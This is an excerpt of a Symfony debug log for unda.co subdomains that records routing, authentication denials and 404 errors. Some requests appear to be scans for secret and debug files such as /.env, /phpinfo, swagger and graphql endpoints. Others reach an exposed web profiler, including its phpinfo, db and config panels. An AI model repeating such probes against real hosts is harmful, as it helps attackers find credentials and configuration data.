  620. [2025-12-16 09:42:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  621. [2025-12-16 09:42:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  622. [2025-12-16 09:42:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  623. [2025-12-16 09:42:49] security.DEBUG: Calling Authentication entry point. [] []
  624. [2025-12-16 09:42:49] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  625. [2025-12-16 09:43:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
  626. [2025-12-16 09:43:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  627. [2025-12-16 09:49:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=router","method":"GET"} []
  628. [2025-12-16 09:49:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  629. [2025-12-16 09:54:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f469b8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f469b8","method":"GET"} []
  630. [2025-12-16 09:54:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  631. [2025-12-16 10:08:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  632. [2025-12-16 10:08:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  633. [2025-12-16 10:08:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  634. [2025-12-16 10:20:54] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  635. [2025-12-16 10:27:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=request","method":"GET"} []
  636. [2025-12-16 10:27:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  637. [2025-12-16 10:27:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8a2fcc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8a2fcc?panel=security","method":"GET"} []
  638. [2025-12-16 10:27:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  639. [2025-12-16 10:30:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"054b2f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/054b2f?panel=cache","method":"GET"} []
  640. [2025-12-16 10:30:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  641. [2025-12-16 10:32:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=dump","method":"GET"} []
  642. [2025-12-16 10:32:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  643. [2025-12-16 10:33:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  644. [2025-12-16 10:40:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?group=1&panel=db","method":"GET"} []
  645. [2025-12-16 10:40:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  646. [2025-12-16 10:42:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  647. [2025-12-16 10:44:27] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  648. [2025-12-16 10:45:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=time","method":"GET"} []
  649. [2025-12-16 10:45:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  650. [2025-12-16 10:48:31] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  651. [2025-12-16 10:48:32] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  652. [2025-12-16 10:48:32] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  653. [2025-12-16 10:48:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  654. [2025-12-16 10:48:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  655. [2025-12-16 10:48:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  656. [2025-12-16 10:48:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  657. [2025-12-16 10:48:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  658. [2025-12-16 10:48:32] security.DEBUG: Calling Authentication entry point. [] []
  659. [2025-12-16 10:48:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  660. [2025-12-16 10:48:51] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  661. [2025-12-16 10:48:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  662. [2025-12-16 10:48:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  663. [2025-12-16 10:48:51] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  664. [2025-12-16 10:48:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  665. [2025-12-16 10:48:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  666. [2025-12-16 10:48:51] security.DEBUG: Calling Authentication entry point. [] []
  667. [2025-12-16 10:48:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=time","method":"GET"} []
  668. [2025-12-16 10:48:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  669. [2025-12-16 10:48:52] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  670. [2025-12-16 10:48:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  671. [2025-12-16 10:49:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  672. [2025-12-16 10:50:55] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  673. [2025-12-16 10:52:18] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  674. [2025-12-16 10:52:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  675. [2025-12-16 10:58:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=cache","method":"GET"} []
  676. [2025-12-16 10:58:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  677. [2025-12-16 10:59:46] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  678. [2025-12-16 10:59:46] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  679. [2025-12-16 10:59:46] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  680. [2025-12-16 10:59:46] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  681. [2025-12-16 10:59:46] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  682. [2025-12-16 10:59:46] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  683. [2025-12-16 10:59:46] security.DEBUG: Calling Authentication entry point. [] []
  684. [2025-12-16 11:00:24] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  685. [2025-12-16 11:01:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?group=1&panel=db","method":"GET"} []
  686. [2025-12-16 11:01:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  687. [2025-12-16 11:05:15] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  688. [2025-12-16 11:05:15] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  689. [2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  690. [2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  691. [2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  692. [2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  693. [2025-12-16 11:05:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  694. [2025-12-16 11:05:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  695. [2025-12-16 11:05:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  696. [2025-12-16 11:05:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  697. [2025-12-16 11:05:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  698. [2025-12-16 11:05:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  699. [2025-12-16 11:05:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  700. [2025-12-16 11:05:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  701. [2025-12-16 11:05:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  702. [2025-12-16 11:05:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  703. [2025-12-16 11:05:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  704. [2025-12-16 11:05:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
